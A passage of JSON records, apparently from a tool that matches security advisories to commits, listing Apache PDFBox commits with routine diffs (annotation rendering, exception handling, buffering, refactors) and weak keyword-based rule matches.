PlainText(annotation.getContents()))", - "+ .width(getRectangle().getWidth())", - "+ .wrapLines(true)", - "+ //TODO some reverse engineering needed to find out padding", - "+ //TODO fat cloudy rectangle in CTAN file has \"the\" incomplete", - "+ .initialOffset(getRectangle().getLowerLeftX() + fontSize / 2 * factor, ", - "+ getRectangle().getUpperRightY() - font.getBoundingBox().getHeight() * fontSize / 1000 * factor)", - "+ // Adobe ignores the /Q", - "+ //.textAlign(annotation.getQ())", - "+ .build();", - "+ formatter.format();", - "+ cs.endText();", - "+", - "@@ -302,2 +337,56 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - "+ //TODO extractNonStrokingColor and extractFontSize", - "+ // might somehow be replaced with PDDefaultAppearanceString,", - "+ // which is quite similar.", - "+ private float extractFontSize(PDAnnotationFreeText annotation)", - "+ {", - "+ String defaultAppearance = annotation.getDefaultAppearance();", - "+ if (defaultAppearance == null)", - "+ {", - "+ return 10;", - "+ }", - "+", - "+ try", - "+ {", - "+ // not sure if charset is correct, but we only need numbers and simple characters", - "+ PDFStreamParser parser = new PDFStreamParser(defaultAppearance.getBytes(Charsets.US_ASCII));", - "+ COSArray arguments = new COSArray();", - "+ COSArray fontArguments = new COSArray();", - "+ for (Object token = parser.parseNextToken(); token != null; token = parser.parseNextToken())", - "+ {", - "+ if (token instanceof COSObject)", - "+ {", - "+ arguments.add(((COSObject) token).getObject());", - "+ }", - "+ else if (token instanceof Operator)", - "+ {", - "+ Operator op = (Operator) token;", - "+ String name = op.getName();", - "+ if (\"Tf\".equals(name))", - "+ {", - "+ fontArguments = arguments;", - "+ }", - "+ arguments = new COSArray();", - "+ }", - "+ else", - "+ {", - "+ arguments.add((COSBase) token);", - "+ }", - "+ }", - "+ if (fontArguments.size() >= 2)", - "+ {", - "+ COSBase base = fontArguments.get(1);", - "+ if (base instanceof COSNumber)", - "+ {", - "+ return ((COSNumber) base).floatValue();", - "+ }", - "+ }", - "+ }", - "+ catch (IOException ex)", - "+ {", - "+ LOG.warn(\"Problem parsing /DA, will use default 10\", ex);", - "+ }", - "+ return 10;", - "+ }", - "+", - " @Override" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "24c8bd833ccec0a4feb5c4645d2ad5ee2e784998", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1527704530, - "hunks": 2, - "message": "PDFBOX-3280: improve javadoc, ordinary users should not use this class, see https://stackoverflow.com/questions/50593597/pdfbox-clone-font git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1832560 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFCloneUtility.java b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFCloneUtility.java", - "index 0b5cb7c67..45a928daa 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFCloneUtility.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFCloneUtility.java", - "@@ -36,3 +36,6 @@ import org.apache.pdfbox.pdmodel.common.COSObjectable;", - " * Utility class used to clone PDF objects. It keeps track of objects it has already cloned.", - "- *", - "+ * Although this class is public, it is for PDFBox internal use and should not be used outside,", - "+ * except by very experienced users. The \"public\" modifier will be removed in 3.0. The class should", - "+ * not be used on documents that are being generated because these can contain unfinished parts,", - "+ * e.g. font subsetting information.", - " */", - "@@ -40,3 +43,2 @@ public class PDFCloneUtility", - " {", - "-", - " private final PDDocument destination;" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFCloneUtility.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3280": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3280", - "relevance": 2 - } - ] - }, - { - "commit_id": "ad61615fd336723169a940ea1eec5955f3d43cde", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524864115, - "hunks": 1, - "message": "PDFBOX-4189: One GsubWorker per font, by Palash Ray git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1830399 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "index 0d47e73bd..bc0743854 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "@@ -349,3 +349,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - "- GsubWorker gsubWorker = gsubWorkers.get(font.getName());", - "+ GsubWorker gsubWorker = gsubWorkers.get(font);", - " if (gsubWorker != null)" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4189": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "4de57b625d7261be418132e9cde3ec5c9a5949c3" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: page", - "relevance": 4 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4189", - "relevance": 2 - } - ] - }, - { - "commit_id": "8917378c09e741d1876e61362470acd095296eb3", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524505169, - "hunks": 3, - "message": "PDFBOX-4200: catch IOException if ICC profile cannot be read and use alternate colorspace git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829910 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDICCBased.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDICCBased.java", - "index f769135a6..cadae346d 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDICCBased.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDICCBased.java", - "@@ -159,25 +159,20 @@ public final class PDICCBased extends PDCIEBasedColorSpace", - " }", - "- catch (RuntimeException e)", - "+ catch (ProfileDataException | CMMException | IllegalArgumentException |", - "+ ArrayIndexOutOfBoundsException | IOException e)", - " {", - "- if (e instanceof ProfileDataException ||", - "- e instanceof CMMException ||", - "- e instanceof IllegalArgumentException ||", - "- e instanceof ArrayIndexOutOfBoundsException)", - "- {", - "- // fall back to alternateColorSpace color space", - "- awtColorSpace = null;", - "- alternateColorSpace = getAlternateColorSpace();", - "- if (alternateColorSpace.equals(PDDeviceRGB.INSTANCE))", - "- {", - "- isRGB = true;", - "- }", - "- LOG.warn(\"Can't read embedded ICC profile (\" + e.getLocalizedMessage() + ", - "- \"), using alternate color space: \" + alternateColorSpace.getName());", - "- initialColor = alternateColorSpace.getInitialColor();", - "- }", - "- else", - "- {", - "- throw e;", - "- }", - "+ fallbackToAlternateColorSpace(e);", - "+ }", - "+ }", - "+", - "+ private void fallbackToAlternateColorSpace(Exception e) throws IOException", - "+ {", - "+ awtColorSpace = null;", - "+ alternateColorSpace = getAlternateColorSpace();", - "+ if (alternateColorSpace.equals(PDDeviceRGB.INSTANCE))", - "+ {", - "+ isRGB = true;", - " }", - "+ LOG.warn(\"Can't read embedded ICC profile (\" + e.getLocalizedMessage() +", - "+ \"), using alternate color space: \" + alternateColorSpace.getName());", - "+ initialColor = alternateColorSpace.getInitialColor();", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDICCBased.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4200": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "7aef2dcd4b421210c2e6d8fab901e036eb59c229" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: file", - "relevance": 4 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4200", - "relevance": 2 - } - ] - }, - { - "commit_id": "68a685b8bae74779d096c3f25395f987f6053806", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1531638679, - "hunks": 1, - "message": "PDFBOX-4071: use correct type git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835946 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDPageLabels.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDPageLabels.java", - "index 81dd09725..cd228e9ff 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDPageLabels.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDPageLabels.java", - "@@ -250,3 +250,3 @@ public class PDPageLabels implements COSObjectable", - " {", - "- return new TreeSet(labels.keySet());", - "+ return new TreeSet<>(labels.keySet());", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/PDPageLabels.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "87992da00da8be052b3547678202d1bed8b94d08" - ], - [ - "no-tag", - "95f78fd8cea488ec1ce24c0e5ff0778c4c7f5e2f" - ], - [ - "no-tag", - "9f7901252289e3c4b8c20a23d6c14a9fd90f4cb0" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: page", - "relevance": 4 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "7994005652433cf5139ec1827b62ce8686fd0f58", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530977713, - "hunks": 6, - "message": "PDFBOX-4068: change deprecation message because we're currently not intending to remove these methods, as suggested by Michael Klink git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1835316 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "index f9998e197..97e9d6448 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "@@ -2304,3 +2304,3 @@ public final class PDPageContentStream implements Closeable", - " * @throws IOException If an error occurs while writing to the stream.", - "- * @deprecated This method will be removed in a future release.", - "+ * @deprecated Usage of this method is discouraged.", - " */", - "@@ -2317,3 +2317,3 @@ public final class PDPageContentStream implements Closeable", - " * @throws IOException If an error occurs while writing to the stream.", - "- * @deprecated This method will be removed in a future release.", - "+ * @deprecated Usage of this method is discouraged.", - " */", - "@@ -2330,3 +2330,3 @@ public final class PDPageContentStream implements Closeable", - " * @throws IOException If an error occurs while writing to the stream.", - "- * @deprecated This method will be removed in a future release.", - "+ * @deprecated Usage of this method is discouraged.", - " */", - "@@ -2343,3 +2343,3 @@ public final class PDPageContentStream implements Closeable", - " * @throws IOException If an error occurs while writing to the stream.", - "- * @deprecated This method will be removed in a future release.", - "+ * @deprecated Usage of this method is discouraged.", - " */", - "@@ -2356,3 +2356,3 @@ public final class PDPageContentStream implements Closeable", - " * @throws IOException If an error occurs while writing to the stream.", - "- * @deprecated This method will be removed in a future release.", - "+ * @deprecated Usage of this method is discouraged.", - " */", - "@@ -2369,3 +2369,3 @@ public final class PDPageContentStream implements Closeable", - " * @throws IOException If an error occurs while writing to the stream.", - "- * @deprecated This method will be removed in a future release.", - "+ * @deprecated Usage of this method is discouraged.", - " */" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4068": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "0814ebc28b001fca71fc3b76fd67a407383e28f8" - ] - ], - "tags": [ - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: page", - "relevance": 4 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4068", - "relevance": 2 - } - ] - }, - { - "commit_id": "43057ddae3110246ac6356cda22d74599fffe9a6", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1525003919, - "hunks": 1, - "message": "PDFBOX-4193: avoid NPE git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1830508 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/debugger/src/main/java/org/apache/pdfbox/debugger/ui/PageEntry.java b/debugger/src/main/java/org/apache/pdfbox/debugger/ui/PageEntry.java", - "index ba8e5234a..ff505eab4 100644", - "--- a/debugger/src/main/java/org/apache/pdfbox/debugger/ui/PageEntry.java", - "+++ b/debugger/src/main/java/org/apache/pdfbox/debugger/ui/PageEntry.java", - "@@ -67,2 +67,6 @@ public class PageEntry", - " COSArray kids = (COSArray)parent.getDictionaryObject(COSName.KIDS);", - "+ if (kids == null)", - "+ {", - "+ return \"\";", - "+ }", - " int idx = kids.indexOfObject(node);" - ], - "changed_files": [ - "debugger/src/main/java/org/apache/pdfbox/debugger/ui/PageEntry.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4193": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "63b2a4d30a6d22a023399a21dd49b129086bb14f" - ] - ], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: page", - "relevance": 4 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4193", - "relevance": 2 - } - ] - }, - { - "commit_id": "0a5646fd667580075958fc7cfb9a1f62c6023583", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1531337138, - "hunks": 16, - "message": "PDFBOX-4260: support scratch file buffer instead of byte array output stream, by Jesse Long git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835665 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/cos/COSOutputStream.java b/pdfbox/src/main/java/org/apache/pdfbox/cos/COSOutputStream.java", - "index 14b18ba97..ff72d1c1c 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/cos/COSOutputStream.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/cos/COSOutputStream.java", - "@@ -19,6 +19,5 @@ package org.apache.pdfbox.cos;", - "-import java.io.ByteArrayInputStream;", - "-import java.io.ByteArrayOutputStream;", - " import java.io.FilterOutputStream;", - " import java.io.IOException;", - "+import java.io.InputStream;", - " import java.io.OutputStream;", - "@@ -26,2 +25,5 @@ import java.util.List;", - " import org.apache.pdfbox.filter.Filter;", - "+import org.apache.pdfbox.io.RandomAccess;", - "+import org.apache.pdfbox.io.RandomAccessInputStream;", - "+import org.apache.pdfbox.io.RandomAccessOutputStream;", - " import org.apache.pdfbox.io.ScratchFile;", - "@@ -37,5 +39,5 @@ public final class COSOutputStream extends FilterOutputStream", - " private final COSDictionary parameters;", - "- // todo: this is an in-memory buffer, should use scratch file (if any) instead", - "- private ByteArrayOutputStream buffer = new ByteArrayOutputStream();", - "- ", - "+ private final ScratchFile scratchFile;", - "+ private RandomAccess buffer;", - "+", - " /**", - "@@ -46,6 +48,8 @@ public final class COSOutputStream extends FilterOutputStream", - " * @param output Encoded stream.", - "- * @param scratchFile Scratch file to use, or null.", - "+ * @param scratchFile Scratch file to use.", - "+ * ", - "+ * @throws IOException If there was an error creating a temporary buffer", - " */", - " COSOutputStream(List filters, COSDictionary parameters, OutputStream output,", - "- ScratchFile scratchFile)", - "+ ScratchFile scratchFile) throws IOException", - " {", - "@@ -54,2 +58,12 @@ public final class COSOutputStream extends FilterOutputStream", - " this.parameters = parameters;", - "+ this.scratchFile = scratchFile;", - "+", - "+ if (filters.isEmpty())", - "+ {", - "+ this.buffer = null;", - "+ }", - "+ else", - "+ {", - "+ this.buffer = scratchFile.createBuffer();", - "+ }", - " }", - "@@ -59,3 +73,10 @@ public final class COSOutputStream extends FilterOutputStream", - " {", - "- buffer.write(b);", - "+ if (buffer != null)", - "+ {", - "+ buffer.write(b);", - "+ }", - "+ else", - "+ {", - "+ super.write(b);", - "+ }", - " }", - "@@ -65,3 +86,10 @@ public final class COSOutputStream extends FilterOutputStream", - " {", - "- buffer.write(b, off, len);", - "+ if (buffer != null)", - "+ {", - "+ buffer.write(b, off, len);", - "+ }", - "+ else", - "+ {", - "+ super.write(b, off, len);", - "+ }", - " }", - "@@ -71,3 +99,10 @@ public final class COSOutputStream extends FilterOutputStream", - " {", - "- buffer.write(b);", - "+ if (buffer != null)", - "+ {", - "+ buffer.write(b);", - "+ }", - "+ else", - "+ {", - "+ super.write(b);", - "+ }", - " }", - "@@ -78,3 +113,3 @@ public final class COSOutputStream extends FilterOutputStream", - " }", - "- ", - "+", - " @Override", - "@@ -82,18 +117,54 @@ public final class COSOutputStream extends FilterOutputStream", - " {", - "- if (buffer == null)", - "+ try", - " {", - "- return;", - "+ if (buffer != null)", - "+ {", - "+ try", - "+ {", - "+ // apply filters in reverse order", - "+ for (int i = filters.size() - 1; i >= 0; i--)", - "+ {", - "+ try (InputStream unfilteredIn = new RandomAccessInputStream(buffer))", - "+ {", - "+ if (i == 0)", - "+ {", - "+ /*", - "+ * The last filter to run can encode directly to the enclosed output", - "+ * stream.", - "+ */", - "+ filters.get(i).encode(unfilteredIn, out, parameters, i);", - "+ }", - "+ else", - "+ {", - "+ RandomAccess filteredBuffer = scratchFile.createBuffer();", - "+ try", - "+ {", - "+ try (OutputStream filteredOut = new RandomAccessOutputStream(filteredBuffer))", - "+ {", - "+ filters.get(i).encode(unfilteredIn, filteredOut, parameters, i);", - "+ }", - "+", - "+ RandomAccess tmpSwap = filteredBuffer;", - "+ filteredBuffer = buffer;", - "+ buffer = tmpSwap;", - "+ }", - "+ finally", - "+ {", - "+ filteredBuffer.close();", - "+ }", - "+ }", - "+ }", - "+ }", - "+ }", - "+ finally", - "+ {", - "+ buffer.close();", - "+ buffer = null;", - "+ }", - "+ }", - " }", - "- // apply filters in reverse order", - "- for (int i = filters.size() - 1; i >= 0; i--)", - "+ finally", - " {", - "- // todo: this is an in-memory buffer, should use scratch file (if any) instead", - "- ByteArrayInputStream input = new ByteArrayInputStream(buffer.toByteArray());", - "- buffer = new ByteArrayOutputStream();", - "- filters.get(i).encode(input, buffer, parameters, i);", - "+ super.close();", - " }", - "- // flush the entire stream", - "- buffer.writeTo(out);", - "- super.close();", - "- buffer = null;", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/cos/COSOutputStream.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4260": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "1d69f40375c8dfef4bd3e0de4f7d39df15d18845" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: file", - "relevance": 4 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4260", - "relevance": 2 - } - ] - }, - { - "commit_id": "a2dba1ca3490d764a20d98e3dda2d78ca275e32f", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1532979884, - "hunks": 2, - "message": "PDFBOX-4071: final modifier not needed for private method git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1837085 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/COSParser.java b/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/COSParser.java", - "index 4571b5e8d..5b501d10f 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/COSParser.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/COSParser.java", - "@@ -457,3 +457,3 @@ public class COSParser extends BaseParser", - " */", - "- private final long getStartxrefOffset() throws IOException", - "+ private long getStartxrefOffset() throws IOException", - " {", - "@@ -2152,3 +2152,3 @@ public class COSParser extends BaseParser", - " */", - "- private final COSDictionary rebuildTrailer() throws IOException", - "+ private COSDictionary rebuildTrailer() throws IOException", - " {" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdfparser/COSParser.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: parse", - "relevance": 4 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "edfb9dd8e1e653ca124324c9c9e5473fba121d05", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524335690, - "hunks": 1, - "message": "PDFBOX-4189: pass change missed in last commit git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829738 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "index de27a5f4c..50be140c1 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "@@ -361,3 +361,3 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - "- COSWriter.writeString(font.encode(text), getOutputStream());", - "+ COSWriter.writeString(encodedText, getOutputStream());", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4189": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: page", - "relevance": 4 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4189", - "relevance": 2 - } - ] - }, - { - "commit_id": "ac862727d9b2da1e9ee5a64cbd66768ccaf9b1d2", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1525930039, - "hunks": 19, - "message": "PDFBOX-4068: refactor: outputStream is only ever set within constructors, make it a constructor parameter git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831304 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", - "index 0d3eb8ca2..9aa76857b 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", - "@@ -57,3 +57,3 @@ abstract class PDAbstractContentStream implements Closeable", - " {", - "- private OutputStream outputStream;", - "+ protected final OutputStream outputStream;", - " private PDResources resources;", - "@@ -70,12 +70,2 @@ abstract class PDAbstractContentStream implements Closeable", - "- /**", - "- * Create a new appearance stream.", - "- *", - "- */", - "- public PDAbstractContentStream()", - "- {", - "- formatDecimal.setMaximumFractionDigits(4);", - "- formatDecimal.setGroupingUsed(false);", - "- }", - "-", - " /**", - "@@ -85,3 +75,3 @@ abstract class PDAbstractContentStream implements Closeable", - " */", - "- public PDAbstractContentStream(OutputStream outputStream)", - "+ PDAbstractContentStream(OutputStream outputStream)", - " {", - "@@ -105,12 +95,2 @@ abstract class PDAbstractContentStream implements Closeable", - "- public OutputStream getOutputStream()", - "- {", - "- return outputStream;", - "- }", - "-", - "- public void setOutputStream(OutputStream outputStream)", - "- {", - "- this.outputStream = outputStream;", - "- }", - "-", - " public PDResources getResources()", - "@@ -1485,7 +1465,3 @@ abstract class PDAbstractContentStream implements Closeable", - " {", - "- if (outputStream != null)", - "- {", - "- outputStream.close();", - "- outputStream = null;", - "- }", - "+ outputStream.close();", - " }", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "index d9032a819..82e4aca6c 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "@@ -59,2 +59,3 @@ import org.apache.pdfbox.pdmodel.graphics.state.RenderingMode;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceStream;", - "+import org.apache.pdfbox.util.Charsets;", - " import org.apache.pdfbox.util.Matrix;", - "@@ -151,6 +152,11 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - " {", - "- super();", - "+ this(document, sourcePage, appendContent, compress, resetContext, new PDStream(document));", - "+ }", - "+", - "+ private PDPageContentStream(PDDocument document, PDPage sourcePage, AppendMode appendContent,", - "+ boolean compress, boolean resetContext, PDStream stream) throws IOException", - "+ {", - "+ super(stream.createOutputStream(compress ? COSName.FLATE_DECODE : null));", - " this.document = document;", - "- COSName filter = compress ? COSName.FLATE_DECODE : null;", - "- ", - "+", - " // If request specifies the need to append/prepend to the document", - "@@ -158,5 +164,2 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - " {", - "- // Create a 